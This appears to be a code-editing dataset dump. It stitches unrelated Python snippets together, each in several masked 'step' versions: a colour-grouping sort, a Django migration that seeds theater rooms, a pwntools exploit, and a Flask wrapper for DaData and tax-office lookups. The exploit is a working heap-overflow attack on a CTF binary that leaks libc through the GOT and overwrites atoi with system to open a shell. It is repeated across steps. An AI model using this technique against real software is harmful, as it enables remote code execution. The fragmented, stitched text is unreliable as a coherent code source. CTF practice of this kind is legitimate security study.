"step-4": "def group(arr):\n low, mid, high = 0, 0, len(arr) - 1\n while mid <= high:\n print(arr)\n if arr[mid] == 'R':\n arr[low], arr[mid] = arr[mid], arr[low]\n low += 1\n mid += 1\n elif arr[mid] == 'G':\n mid += 1\n else:\n arr[high], arr[mid] = arr[mid], arr[high]\n high -= 1\n return arr\n\n\n*arr, = map(str, input('enter the list of R, G, B').split())\nprint(group(arr))\n",
"step-5": "def group(arr):\r\n low, mid, high = 0, 0, len(arr)-1\r\n while mid <= high:\r\n print(arr)\r\n if arr[mid] == 'R' :\r\n arr[low], arr[mid] = arr[mid], arr[low]\r\n low += 1\r\n mid += 1\r\n elif arr[mid] == 'G':\r\n mid += 1\r\n else:\r\n arr[high], arr[mid] = arr[mid], arr[high]\r\n high -= 1\r\n return arr\r\n \r\n*arr, = map(str, input(\"enter the list of R, G, B\").split())\r\n\r\nprint(group(arr))\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def reverse_func(apps, schema_editor):
""" No need to do anything since the table is dropped completely """
pass
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [migrations.CreateModel(name='TheaterRoom', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('name', models.CharField(max_length=20
)), ('rows_count', models.IntegerField()), ('seats_per_row_count',
models.IntegerField())]), migrations.RunPython(forwards_func,
reverse_func)]
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def forwards_func(apps, schema_editor):
""" Add Theater Rooms """
TheaterRoom = apps.get_model('main', 'TheaterRoom')
db_alias = schema_editor.connection.alias
TheaterRoom.objects.using(db_alias).bulk_create([TheaterRoom(name=
'Red Room', rows_count=10, seats_per_row_count=15), TheaterRoom(
name='Blue Room', rows_count=20, seats_per_row_count=30)])
def reverse_func(apps, schema_editor):
""" No need to do anything since the table is dropped completely """
pass
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [migrations.CreateModel(name='TheaterRoom', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('name', models.CharField(max_length=20
)), ('rows_count', models.IntegerField()), ('seats_per_row_count',
models.IntegerField())]), migrations.RunPython(forwards_func,
reverse_func)]
<|reserved_special_token_1|>
from django.db import migrations, models
def forwards_func(apps, schema_editor):
""" Add Theater Rooms """
TheaterRoom = apps.get_model('main', 'TheaterRoom')
db_alias = schema_editor.connection.alias
TheaterRoom.objects.using(db_alias).bulk_create([TheaterRoom(name=
'Red Room', rows_count=10, seats_per_row_count=15), TheaterRoom(
name='Blue Room', rows_count=20, seats_per_row_count=30)])
def reverse_func(apps, schema_editor):
""" No need to do anything since the table is dropped completely """
pass
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [migrations.CreateModel(name='TheaterRoom', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('name', models.CharField(max_length=20
)), ('rows_count', models.IntegerField()), ('seats_per_row_count',
models.IntegerField())]), migrations.RunPython(forwards_func,
reverse_func)]
<|reserved_special_token_1|>
# Generated by Django 2.2.3 on 2019-07-14 13:34
from django.db import migrations, models
def forwards_func(apps, schema_editor):
""" Add Theater Rooms """
TheaterRoom = apps.get_model("main", "TheaterRoom")
db_alias = schema_editor.connection.alias
TheaterRoom.objects.using(db_alias).bulk_create([
TheaterRoom(name="Red Room", rows_count=10, seats_per_row_count=15),
TheaterRoom(name="Blue Room", rows_count=20, seats_per_row_count=30),
])
def reverse_func(apps, schema_editor):
""" No need to do anything since the table is dropped completely """
pass
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='TheaterRoom',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
('rows_count', models.IntegerField()),
('seats_per_row_count', models.IntegerField()),
],
),
migrations.RunPython(forwards_func, reverse_func),
]
|
flexible
|
{
"blob_id": "a4b61a5a79e314e56ba25c6e2e735bd2ee4ef0d3",
"index": 4551,
"step-1": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\ndef reverse_func(apps, schema_editor):\n \"\"\" No need to do anything since the table is dropped completely \"\"\"\n pass\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='TheaterRoom', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('name', models.CharField(max_length=20\n )), ('rows_count', models.IntegerField()), ('seats_per_row_count',\n models.IntegerField())]), migrations.RunPython(forwards_func,\n reverse_func)]\n",
"step-3": "<mask token>\n\n\ndef forwards_func(apps, schema_editor):\n \"\"\" Add Theater Rooms \"\"\"\n TheaterRoom = apps.get_model('main', 'TheaterRoom')\n db_alias = schema_editor.connection.alias\n TheaterRoom.objects.using(db_alias).bulk_create([TheaterRoom(name=\n 'Red Room', rows_count=10, seats_per_row_count=15), TheaterRoom(\n name='Blue Room', rows_count=20, seats_per_row_count=30)])\n\n\ndef reverse_func(apps, schema_editor):\n \"\"\" No need to do anything since the table is dropped completely \"\"\"\n pass\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='TheaterRoom', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('name', models.CharField(max_length=20\n )), ('rows_count', models.IntegerField()), ('seats_per_row_count',\n models.IntegerField())]), migrations.RunPython(forwards_func,\n reverse_func)]\n",
"step-4": "from django.db import migrations, models\n\n\ndef forwards_func(apps, schema_editor):\n \"\"\" Add Theater Rooms \"\"\"\n TheaterRoom = apps.get_model('main', 'TheaterRoom')\n db_alias = schema_editor.connection.alias\n TheaterRoom.objects.using(db_alias).bulk_create([TheaterRoom(name=\n 'Red Room', rows_count=10, seats_per_row_count=15), TheaterRoom(\n name='Blue Room', rows_count=20, seats_per_row_count=30)])\n\n\ndef reverse_func(apps, schema_editor):\n \"\"\" No need to do anything since the table is dropped completely \"\"\"\n pass\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='TheaterRoom', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('name', models.CharField(max_length=20\n )), ('rows_count', models.IntegerField()), ('seats_per_row_count',\n models.IntegerField())]), migrations.RunPython(forwards_func,\n reverse_func)]\n",
"step-5": "# Generated by Django 2.2.3 on 2019-07-14 13:34\n\nfrom django.db import migrations, models\n\n\ndef forwards_func(apps, schema_editor):\n \"\"\" Add Theater Rooms \"\"\"\n TheaterRoom = apps.get_model(\"main\", \"TheaterRoom\")\n db_alias = schema_editor.connection.alias\n TheaterRoom.objects.using(db_alias).bulk_create([\n TheaterRoom(name=\"Red Room\", rows_count=10, seats_per_row_count=15),\n TheaterRoom(name=\"Blue Room\", rows_count=20, seats_per_row_count=30),\n ])\n\n\ndef reverse_func(apps, schema_editor):\n \"\"\" No need to do anything since the table is dropped completely \"\"\"\n pass\n\n\nclass Migration(migrations.Migration):\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='TheaterRoom',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=20)),\n ('rows_count', models.IntegerField()),\n ('seats_per_row_count', models.IntegerField()),\n ],\n ),\n migrations.RunPython(forwards_func, reverse_func),\n ]\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
#+++++++++++++++++++exp.py++++++++++++++++++++
#!/usr/bin/python
# -*- coding:utf-8 -*-
#Author: Squarer
#Time: 2020.11.15 20.20.51
#+++++++++++++++++++exp.py++++++++++++++++++++
from pwn import*
#context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./npuctf_2020_easyheap')
libc = ELF('./libc-2.27.so')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
def add(size, cont):
    """Menu option 1: allocate a heap chunk of `size` bytes filled with `cont`.

    The target binary only honours sizes 0x10 or 0x20 per its own prompt.
    """
    exchanges = (
        ('Your choice :', '1'),
        ('Size of Heap(0x10 or 0x20 only) : ', str(size)),
        ('Content:', str(cont)),
    )
    for marker, payload in exchanges:
        sh.sendlineafter(marker, payload)
def edit(index, cont):
    """Menu option 2: overwrite the content of chunk `index` with `cont`.

    Menu navigation is line-based, but the payload itself is delivered with
    sendafter (no trailing newline), matching the binary's raw read.
    """
    sendline = sh.sendlineafter
    sendline('Your choice :', '2')
    sendline('Index :', str(index))
    sh.sendafter('Content: ', str(cont))
def delete(index):
    """Menu option 4: free the chunk at `index`."""
    for marker, payload in (('Your choice :', '4'), ('Index :', str(index))):
        sh.sendlineafter(marker, payload)
def show(index):
    """Menu option 3: ask the binary to print the content of chunk `index`."""
    for marker, payload in (('Your choice :', '3'), ('Index :', str(index))):
        sh.sendlineafter(marker, payload)
def show_addr(name, addr):
    """Log a labelled address in hex through pwntools' success logger."""
    message = 'The {} Addr:{}'.format(str(name), str(hex(addr)))
    log.success(message)
# NOTE(review): the local process handle is immediately overwritten by the
# remote connection, so a stray local process is spawned and never closed.
sh = process('./npuctf_2020_easyheap')
sh = remote('node3.buuoj.cn',27634)
# -- Stage 1: overflow --
# edit() writes 0x18 bytes of padding plus one extra byte, clobbering the
# least-significant byte of the next chunk's size field with 0x41 before
# freeing it, so the freed chunk is larger than its real allocation.
add(0x18,'A'*8)
add(0x18,'B'*8)
edit(0,'A'*0x18+'\x41')
delete(1)
# -- Stage 2: leak libc --
# Re-allocate 0x38 bytes over the freed (oversized) region; the payload lays
# down what looks like a size/pointer management record whose content pointer
# is redirected to atoi@GOT, so show() leaks a live libc address.
add(0x38,'A'*8) #1
payload = 'A'*0x10 + p64(0) + p64(0x21)
payload += p64(0x38) + p64(elf.got['atoi'])
edit(1,payload)
show(1)
sh.recvuntil('Content : ')
# Leaked pointer is 6 bytes on the wire; pad to 8 before u64, then rebase.
libc_addr = u64(sh.recv(6).ljust(8,'\x00')) - libc.sym['atoi']
system_addr = libc_addr + libc.sym['system']
show_addr('libc_addr',libc_addr)
show_addr('system_addr',system_addr)
# -- Stage 3: hijack --
# Overwrite atoi@GOT with system; the menu's next atoi(input) call becomes
# system(input), so typing "/bin/sh" at the prompt yields a shell.
edit(1,p64(system_addr))
#gdb.attach(sh,'b*0x400E6D')
sh.interactive()
|
normal
|
{
"blob_id": "eeedf4930a7fa58fd406a569db6281476c2e3e35",
"index": 4870,
"step-1": "<mask token>\n\n\ndef add(size, cont):\n sh.sendlineafter('Your choice :', '1')\n sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))\n sh.sendlineafter('Content:', str(cont))\n\n\ndef edit(index, cont):\n sh.sendlineafter('Your choice :', '2')\n sh.sendlineafter('Index :', str(index))\n sh.sendafter('Content: ', str(cont))\n\n\ndef delete(index):\n sh.sendlineafter('Your choice :', '4')\n sh.sendlineafter('Index :', str(index))\n\n\n<mask token>\n\n\ndef show_addr(name, addr):\n log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef add(size, cont):\n sh.sendlineafter('Your choice :', '1')\n sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))\n sh.sendlineafter('Content:', str(cont))\n\n\ndef edit(index, cont):\n sh.sendlineafter('Your choice :', '2')\n sh.sendlineafter('Index :', str(index))\n sh.sendafter('Content: ', str(cont))\n\n\ndef delete(index):\n sh.sendlineafter('Your choice :', '4')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show(index):\n sh.sendlineafter('Your choice :', '3')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show_addr(name, addr):\n log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))\n\n\n<mask token>\nadd(24, 'A' * 8)\nadd(24, 'B' * 8)\nedit(0, 'A' * 24 + 'A')\ndelete(1)\nadd(56, 'A' * 8)\n<mask token>\npayload += p64(56) + p64(elf.got['atoi'])\nedit(1, payload)\nshow(1)\nsh.recvuntil('Content : ')\n<mask token>\nshow_addr('libc_addr', libc_addr)\nshow_addr('system_addr', system_addr)\nedit(1, p64(system_addr))\nsh.interactive()\n",
"step-3": "<mask token>\ncontext.arch = 'amd64'\nelf = ELF('./npuctf_2020_easyheap')\nlibc = ELF('./libc-2.27.so')\n\n\ndef add(size, cont):\n sh.sendlineafter('Your choice :', '1')\n sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))\n sh.sendlineafter('Content:', str(cont))\n\n\ndef edit(index, cont):\n sh.sendlineafter('Your choice :', '2')\n sh.sendlineafter('Index :', str(index))\n sh.sendafter('Content: ', str(cont))\n\n\ndef delete(index):\n sh.sendlineafter('Your choice :', '4')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show(index):\n sh.sendlineafter('Your choice :', '3')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show_addr(name, addr):\n log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))\n\n\nsh = process('./npuctf_2020_easyheap')\nsh = remote('node3.buuoj.cn', 27634)\nadd(24, 'A' * 8)\nadd(24, 'B' * 8)\nedit(0, 'A' * 24 + 'A')\ndelete(1)\nadd(56, 'A' * 8)\npayload = 'A' * 16 + p64(0) + p64(33)\npayload += p64(56) + p64(elf.got['atoi'])\nedit(1, payload)\nshow(1)\nsh.recvuntil('Content : ')\nlibc_addr = u64(sh.recv(6).ljust(8, '\\x00')) - libc.sym['atoi']\nsystem_addr = libc_addr + libc.sym['system']\nshow_addr('libc_addr', libc_addr)\nshow_addr('system_addr', system_addr)\nedit(1, p64(system_addr))\nsh.interactive()\n",
"step-4": "from pwn import *\ncontext.arch = 'amd64'\nelf = ELF('./npuctf_2020_easyheap')\nlibc = ELF('./libc-2.27.so')\n\n\ndef add(size, cont):\n sh.sendlineafter('Your choice :', '1')\n sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))\n sh.sendlineafter('Content:', str(cont))\n\n\ndef edit(index, cont):\n sh.sendlineafter('Your choice :', '2')\n sh.sendlineafter('Index :', str(index))\n sh.sendafter('Content: ', str(cont))\n\n\ndef delete(index):\n sh.sendlineafter('Your choice :', '4')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show(index):\n sh.sendlineafter('Your choice :', '3')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show_addr(name, addr):\n log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))\n\n\nsh = process('./npuctf_2020_easyheap')\nsh = remote('node3.buuoj.cn', 27634)\nadd(24, 'A' * 8)\nadd(24, 'B' * 8)\nedit(0, 'A' * 24 + 'A')\ndelete(1)\nadd(56, 'A' * 8)\npayload = 'A' * 16 + p64(0) + p64(33)\npayload += p64(56) + p64(elf.got['atoi'])\nedit(1, payload)\nshow(1)\nsh.recvuntil('Content : ')\nlibc_addr = u64(sh.recv(6).ljust(8, '\\x00')) - libc.sym['atoi']\nsystem_addr = libc_addr + libc.sym['system']\nshow_addr('libc_addr', libc_addr)\nshow_addr('system_addr', system_addr)\nedit(1, p64(system_addr))\nsh.interactive()\n",
"step-5": "#+++++++++++++++++++exp.py++++++++++++++++++++\n#!/usr/bin/python\n# -*- coding:utf-8 -*- \n#Author: Squarer\n#Time: 2020.11.15 20.20.51\n#+++++++++++++++++++exp.py++++++++++++++++++++\nfrom pwn import*\n\n#context.log_level = 'debug'\ncontext.arch = 'amd64'\n\nelf = ELF('./npuctf_2020_easyheap')\nlibc = ELF('./libc-2.27.so')\n#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')\n#libc=ELF('/lib/i386-linux-gnu/libc.so.6')\n\ndef add(size,cont):\n\tsh.sendlineafter('Your choice :','1')\n\tsh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size))\n\tsh.sendlineafter('Content:',str(cont))\n\ndef edit(index,cont):\n\tsh.sendlineafter('Your choice :','2')\n\tsh.sendlineafter('Index :',str(index))\n\tsh.sendafter('Content: ',str(cont))\n\ndef delete(index):\n\tsh.sendlineafter('Your choice :','4')\n\tsh.sendlineafter('Index :',str(index))\n\ndef show(index):\n\tsh.sendlineafter('Your choice :','3')\n\tsh.sendlineafter('Index :',str(index))\n\ndef show_addr(name,addr):\n\tlog.success('The '+str(name)+' Addr:' + str(hex(addr)))\n\nsh = process('./npuctf_2020_easyheap')\nsh = remote('node3.buuoj.cn',27634)\n\n#extending\nadd(0x18,'A'*8)\nadd(0x18,'B'*8)\nedit(0,'A'*0x18+'\\x41')\ndelete(1)\n\n#leaking\nadd(0x38,'A'*8) #1\npayload = 'A'*0x10 + p64(0) + p64(0x21)\npayload += p64(0x38) + p64(elf.got['atoi'])\nedit(1,payload)\n\nshow(1)\nsh.recvuntil('Content : ')\nlibc_addr = u64(sh.recv(6).ljust(8,'\\x00')) - libc.sym['atoi']\nsystem_addr = libc_addr + libc.sym['system']\nshow_addr('libc_addr',libc_addr)\nshow_addr('system_addr',system_addr)\n\n#hijacking\nedit(1,p64(system_addr))\n#gdb.attach(sh,'b*0x400E6D')\n\nsh.interactive()\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
def dadata_clean(method, data):
return dadata_proxy.dadata_clean(method, data)
def get_detailed_address(address):
from fw.utils.address_utils import get_detailed_address as _get_detailed_address
return _get_detailed_address(address)
def dadata_standardize_address(address):
from fw.utils.address_utils import dadata_standardize_address as _dadata_standardize_address
return _dadata_standardize_address(address)
def get_ifns_by_address(address, service_nalog_ru_url):
from services.ifns.ifns_manager import get_ifns_by_address as _get_ifns_by_address
return _get_ifns_by_address(address, service_nalog_ru_url)
<|reserved_special_token_0|>
def get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number,
internal_ifns_service, logger):
from services.ifns.ifns_manager import get_nalog_ru_time_slots as _get_nalog_ru_time_slots
return _get_nalog_ru_time_slots(person_data, company_data,
internal_ifns_number, internal_ifns_service, logger)
def book_ifns(person_data, company_data, internal_ifns_number,
internal_ifns_service, dt, logger):
from services.ifns.ifns_manager import book_ifns as _book_ifns
return _book_ifns(person_data, company_data, internal_ifns_number,
internal_ifns_service, dt, logger)
def get_registration_ifns(service_nalog_ru_url, address_ifns=None):
from services.ifns.ifns_manager import get_registration_ifns as _get_registration_ifns
return _get_registration_ifns(service_nalog_ru_url, address_ifns=
address_ifns)
def get_ifns_registrations(name, company_type='ooo', date_from=None,
date_to=None, service=None, ifns=None, service_nalog_ru_url=None,
logger=None):
from services.ifns.ifns_manager import get_ifns_registrations as _get_ifns_registrations
return _get_ifns_registrations(name, company_type=company_type,
date_from=date_from, date_to=date_to, service=service, ifns=ifns,
service_nalog_ru_url=service_nalog_ru_url, logger=logger)
def check_car_policy(policy_series, policy_number, timeout=20.0):
from services.car_assurance.integration import check_car_policy as _check_car_policy
return _check_car_policy(policy_series, policy_number, timeout=timeout)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def dadata_suggest(method, data):
return dadata_proxy.dadata_suggest(method, data)
def dadata_clean(method, data):
return dadata_proxy.dadata_clean(method, data)
def get_detailed_address(address):
from fw.utils.address_utils import get_detailed_address as _get_detailed_address
return _get_detailed_address(address)
def dadata_standardize_address(address):
from fw.utils.address_utils import dadata_standardize_address as _dadata_standardize_address
return _dadata_standardize_address(address)
def get_ifns_by_address(address, service_nalog_ru_url):
from services.ifns.ifns_manager import get_ifns_by_address as _get_ifns_by_address
return _get_ifns_by_address(address, service_nalog_ru_url)
def get_ifns_by_code(tax_office, service_nalog_ru_url):
from services.ifns.ifns_manager import get_ifns_by_code as _get_ifns_by_code
return _get_ifns_by_code(tax_office, service_nalog_ru_url)
def get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number,
internal_ifns_service, logger):
from services.ifns.ifns_manager import get_nalog_ru_time_slots as _get_nalog_ru_time_slots
return _get_nalog_ru_time_slots(person_data, company_data,
internal_ifns_number, internal_ifns_service, logger)
def book_ifns(person_data, company_data, internal_ifns_number,
internal_ifns_service, dt, logger):
from services.ifns.ifns_manager import book_ifns as _book_ifns
return _book_ifns(person_data, company_data, internal_ifns_number,
internal_ifns_service, dt, logger)
def get_registration_ifns(service_nalog_ru_url, address_ifns=None):
from services.ifns.ifns_manager import get_registration_ifns as _get_registration_ifns
return _get_registration_ifns(service_nalog_ru_url, address_ifns=
address_ifns)
def get_ifns_registrations(name, company_type='ooo', date_from=None,
date_to=None, service=None, ifns=None, service_nalog_ru_url=None,
logger=None):
from services.ifns.ifns_manager import get_ifns_registrations as _get_ifns_registrations
return _get_ifns_registrations(name, company_type=company_type,
date_from=date_from, date_to=date_to, service=service, ifns=ifns,
service_nalog_ru_url=service_nalog_ru_url, logger=logger)
def check_car_policy(policy_series, policy_number, timeout=20.0):
from services.car_assurance.integration import check_car_policy as _check_car_policy
return _check_car_policy(policy_series, policy_number, timeout=timeout)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
cache = CacheWrapper()
def dadata_suggest(method, data):
return dadata_proxy.dadata_suggest(method, data)
def dadata_clean(method, data):
return dadata_proxy.dadata_clean(method, data)
def get_detailed_address(address):
from fw.utils.address_utils import get_detailed_address as _get_detailed_address
return _get_detailed_address(address)
def dadata_standardize_address(address):
from fw.utils.address_utils import dadata_standardize_address as _dadata_standardize_address
return _dadata_standardize_address(address)
def get_ifns_by_address(address, service_nalog_ru_url):
from services.ifns.ifns_manager import get_ifns_by_address as _get_ifns_by_address
return _get_ifns_by_address(address, service_nalog_ru_url)
def get_ifns_by_code(tax_office, service_nalog_ru_url):
from services.ifns.ifns_manager import get_ifns_by_code as _get_ifns_by_code
return _get_ifns_by_code(tax_office, service_nalog_ru_url)
def get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number,
internal_ifns_service, logger):
from services.ifns.ifns_manager import get_nalog_ru_time_slots as _get_nalog_ru_time_slots
return _get_nalog_ru_time_slots(person_data, company_data,
internal_ifns_number, internal_ifns_service, logger)
def book_ifns(person_data, company_data, internal_ifns_number,
internal_ifns_service, dt, logger):
from services.ifns.ifns_manager import book_ifns as _book_ifns
return _book_ifns(person_data, company_data, internal_ifns_number,
internal_ifns_service, dt, logger)
def get_registration_ifns(service_nalog_ru_url, address_ifns=None):
from services.ifns.ifns_manager import get_registration_ifns as _get_registration_ifns
return _get_registration_ifns(service_nalog_ru_url, address_ifns=
address_ifns)
def get_ifns_registrations(name, company_type='ooo', date_from=None,
date_to=None, service=None, ifns=None, service_nalog_ru_url=None,
logger=None):
from services.ifns.ifns_manager import get_ifns_registrations as _get_ifns_registrations
return _get_ifns_registrations(name, company_type=company_type,
date_from=date_from, date_to=date_to, service=service, ifns=ifns,
service_nalog_ru_url=service_nalog_ru_url, logger=logger)
def check_car_policy(policy_series, policy_number, timeout=20.0):
from services.car_assurance.integration import check_car_policy as _check_car_policy
return _check_car_policy(policy_series, policy_number, timeout=timeout)
<|reserved_special_token_1|>
from fw.api import dadata_proxy
from flask import current_app
from fw.cache.cache_wrapper import CacheWrapper
cache = CacheWrapper()
def dadata_suggest(method, data):
return dadata_proxy.dadata_suggest(method, data)
def dadata_clean(method, data):
return dadata_proxy.dadata_clean(method, data)
def get_detailed_address(address):
from fw.utils.address_utils import get_detailed_address as _get_detailed_address
return _get_detailed_address(address)
def dadata_standardize_address(address):
from fw.utils.address_utils import dadata_standardize_address as _dadata_standardize_address
return _dadata_standardize_address(address)
def get_ifns_by_address(address, service_nalog_ru_url):
from services.ifns.ifns_manager import get_ifns_by_address as _get_ifns_by_address
return _get_ifns_by_address(address, service_nalog_ru_url)
def get_ifns_by_code(tax_office, service_nalog_ru_url):
from services.ifns.ifns_manager import get_ifns_by_code as _get_ifns_by_code
return _get_ifns_by_code(tax_office, service_nalog_ru_url)
def get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number,
internal_ifns_service, logger):
from services.ifns.ifns_manager import get_nalog_ru_time_slots as _get_nalog_ru_time_slots
return _get_nalog_ru_time_slots(person_data, company_data,
internal_ifns_number, internal_ifns_service, logger)
def book_ifns(person_data, company_data, internal_ifns_number,
internal_ifns_service, dt, logger):
from services.ifns.ifns_manager import book_ifns as _book_ifns
return _book_ifns(person_data, company_data, internal_ifns_number,
internal_ifns_service, dt, logger)
def get_registration_ifns(service_nalog_ru_url, address_ifns=None):
from services.ifns.ifns_manager import get_registration_ifns as _get_registration_ifns
return _get_registration_ifns(service_nalog_ru_url, address_ifns=
address_ifns)
def get_ifns_registrations(name, company_type='ooo', date_from=None,
date_to=None, service=None, ifns=None, service_nalog_ru_url=None,
logger=None):
from services.ifns.ifns_manager import get_ifns_registrations as _get_ifns_registrations
return _get_ifns_registrations(name, company_type=company_type,
date_from=date_from, date_to=date_to, service=service, ifns=ifns,
service_nalog_ru_url=service_nalog_ru_url, logger=logger)
def check_car_policy(policy_series, policy_number, timeout=20.0):
from services.car_assurance.integration import check_car_policy as _check_car_policy
return _check_car_policy(policy_series, policy_number, timeout=timeout)
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
from fw.api import dadata_proxy
from flask import current_app
from fw.cache.cache_wrapper import CacheWrapper
# Shared cache instance; not referenced by any function visible in this
# module, so presumably imported and used by other modules — TODO confirm.
cache = CacheWrapper()
def dadata_suggest(method, data):
    """Forward a DaData "suggest" call to the shared dadata_proxy client."""
    forward = dadata_proxy.dadata_suggest
    return forward(method, data)
def dadata_clean(method, data):
    """Forward a DaData "clean" (standardisation) call to dadata_proxy."""
    forward = dadata_proxy.dadata_clean
    return forward(method, data)
def get_detailed_address(address):
    """Resolve `address` via fw.utils.address_utils.

    The import is deferred to call time (presumably to break an import
    cycle — confirm before hoisting it to module level).
    """
    from fw.utils import address_utils
    return address_utils.get_detailed_address(address)
def dadata_standardize_address(address):
    """Standardise `address` through fw.utils.address_utils (lazy import)."""
    from fw.utils import address_utils
    return address_utils.dadata_standardize_address(address)
def get_ifns_by_address(address, service_nalog_ru_url):
    """Find the tax inspection (IFNS) serving `address` via ifns_manager."""
    from services.ifns import ifns_manager
    return ifns_manager.get_ifns_by_address(address, service_nalog_ru_url)
def get_ifns_by_code(tax_office, service_nalog_ru_url):
    """Look up an IFNS by its numeric office code via ifns_manager."""
    from services.ifns import ifns_manager
    return ifns_manager.get_ifns_by_code(tax_office, service_nalog_ru_url)
def get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number, internal_ifns_service, logger):
    """Fetch available nalog.ru appointment slots for the given IFNS service."""
    from services.ifns import ifns_manager
    return ifns_manager.get_nalog_ru_time_slots(
        person_data, company_data, internal_ifns_number, internal_ifns_service, logger)
def book_ifns(person_data, company_data, internal_ifns_number, internal_ifns_service, dt, logger):
    """Book an IFNS appointment at datetime `dt` via ifns_manager."""
    from services.ifns import ifns_manager
    return ifns_manager.book_ifns(
        person_data, company_data, internal_ifns_number, internal_ifns_service, dt, logger)
def get_registration_ifns(service_nalog_ru_url, address_ifns=None):
    """Return the registering IFNS, optionally narrowed by `address_ifns`."""
    from services.ifns import ifns_manager
    return ifns_manager.get_registration_ifns(
        service_nalog_ru_url, address_ifns=address_ifns)
def get_ifns_registrations(name, company_type='ooo', date_from=None, date_to=None,
                           service=None, ifns=None, service_nalog_ru_url=None, logger=None):
    """Query IFNS registration records for company `name`.

    All filters are optional and forwarded verbatim to
    services.ifns.ifns_manager.get_ifns_registrations (lazy import).
    """
    from services.ifns import ifns_manager
    return ifns_manager.get_ifns_registrations(
        name,
        company_type=company_type,
        date_from=date_from,
        date_to=date_to,
        service=service,
        ifns=ifns,
        service_nalog_ru_url=service_nalog_ru_url,
        logger=logger,
    )
def check_car_policy(policy_series, policy_number, timeout=20.0):
    """Verify a car insurance policy by series and number.

    `timeout` is forwarded to the integration layer (default 20.0).
    """
    from services.car_assurance import integration
    return integration.check_car_policy(policy_series, policy_number, timeout=timeout)
|
flexible
|
{
"blob_id": "af4d2380f92ea636594695e5ad4ba766d6874dd3",
"index": 1355,
"step-1": "<mask token>\n\n\ndef dadata_clean(method, data):\n return dadata_proxy.dadata_clean(method, data)\n\n\ndef get_detailed_address(address):\n from fw.utils.address_utils import get_detailed_address as _get_detailed_address\n return _get_detailed_address(address)\n\n\ndef dadata_standardize_address(address):\n from fw.utils.address_utils import dadata_standardize_address as _dadata_standardize_address\n return _dadata_standardize_address(address)\n\n\ndef get_ifns_by_address(address, service_nalog_ru_url):\n from services.ifns.ifns_manager import get_ifns_by_address as _get_ifns_by_address\n return _get_ifns_by_address(address, service_nalog_ru_url)\n\n\n<mask token>\n\n\ndef get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number,\n internal_ifns_service, logger):\n from services.ifns.ifns_manager import get_nalog_ru_time_slots as _get_nalog_ru_time_slots\n return _get_nalog_ru_time_slots(person_data, company_data,\n internal_ifns_number, internal_ifns_service, logger)\n\n\ndef book_ifns(person_data, company_data, internal_ifns_number,\n internal_ifns_service, dt, logger):\n from services.ifns.ifns_manager import book_ifns as _book_ifns\n return _book_ifns(person_data, company_data, internal_ifns_number,\n internal_ifns_service, dt, logger)\n\n\ndef get_registration_ifns(service_nalog_ru_url, address_ifns=None):\n from services.ifns.ifns_manager import get_registration_ifns as _get_registration_ifns\n return _get_registration_ifns(service_nalog_ru_url, address_ifns=\n address_ifns)\n\n\ndef get_ifns_registrations(name, company_type='ooo', date_from=None,\n date_to=None, service=None, ifns=None, 